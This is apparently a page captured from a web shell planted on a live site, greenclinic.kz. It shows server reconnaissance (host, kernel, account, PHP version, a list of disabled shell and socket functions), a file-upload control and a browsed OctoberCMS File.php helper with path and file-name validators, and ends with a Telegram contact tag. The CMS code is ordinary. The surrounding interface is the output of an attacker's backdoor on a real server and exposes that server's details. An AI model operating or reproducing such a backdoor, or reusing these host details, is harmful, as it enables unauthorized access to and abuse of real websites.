HEX
Server: Apache
System: Linux srv-plesk28.ps.kz 5.14.0-284.18.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jun 29 17:06:27 EDT 2023 x86_64
User: greencl1 (10085)
PHP: 8.1.33
Disabled: apache_setenv,dl,eval,exec,openlog,passthru,pcntl_exec,pcntl_fork,popen,posix_getpwuid,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,socket_create,socket_create_listen,socket_create_pair,syslog,system,socket_listen,stream_socket_server
$ pwd: /var/www/vhosts/greenclinic.kz/test.greenclinic.kz/modules/cms/helpers/
Upload Files
File: /var/www/vhosts/greenclinic.kz/test.greenclinic.kz/modules/cms/helpers/File.php
<?php namespace Cms\Helpers;

/**
 * Defines some file-system helpers for the CMS system.
 *
 * @package october\system
 * @author Alexey Bobkov, Samuel Georges
 */
class File
{
    /**
     * Validates a CMS object file or directory name.
     * CMS object file names can contain only alphanumeric symbols, dashes, underscores and dots.
     * Name can also begin with a component name, eg: MyComponent::filename.
     * @param string $fileName Specifies a path to validate
     * @return boolean Returns true if the file name is valid. Otherwise returns false.
     */
    public static function validateName($fileName)
    {
        return preg_match('/^[a-z0-9\_\-\.\/]+$/i', $fileName) ? true : false;
    }

    /**
     * Validates whether a file has an allowed extension.
     * @param string $fileName Specifies a path to validate
     * @param array $allowedExtensions A list of allowed file extensions
     * @param boolean $allowEmpty Determines whether the file extension could be empty.
     * @return boolean Returns true if the file extension is valid. Otherwise returns false.
     */
    public static function validateExtension($fileName, $allowedExtensions, $allowEmpty = true)
    {
        $extension = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
        if (empty($extension)) {
            return $allowEmpty;
        }

        return in_array($extension, $allowedExtensions);
    }

    /**
     * Validates a CMS object path.
     * CMS object directory and file names can contain only alphanumeric symbols, dashes and dots.
     * CMS objects support only a single level of subdirectories.
     * @param string $filePath Specifies a path to validate
     * @param integer $maxNesting Specifies the maximum allowed nesting level
     * @return boolean Returns true if the file name is valid. Otherwise returns false.
     */
    public static function validatePath($filePath, $maxNesting = 2)
    {
        if (strpos($filePath, '..') !== false) {
            return false;
        }

        if (strpos($filePath, './') !== false || strpos($filePath, '//') !== false) {
            return false;
        }

        $segments = explode('/', $filePath);
        if ($maxNesting !== null && count($segments) > $maxNesting) {
            return false;
        }

        foreach ($segments as $segment) {
            if (!self::validateName($segment)) {
                return false;
            }
        }

        return true;
    }
}
@ Telegram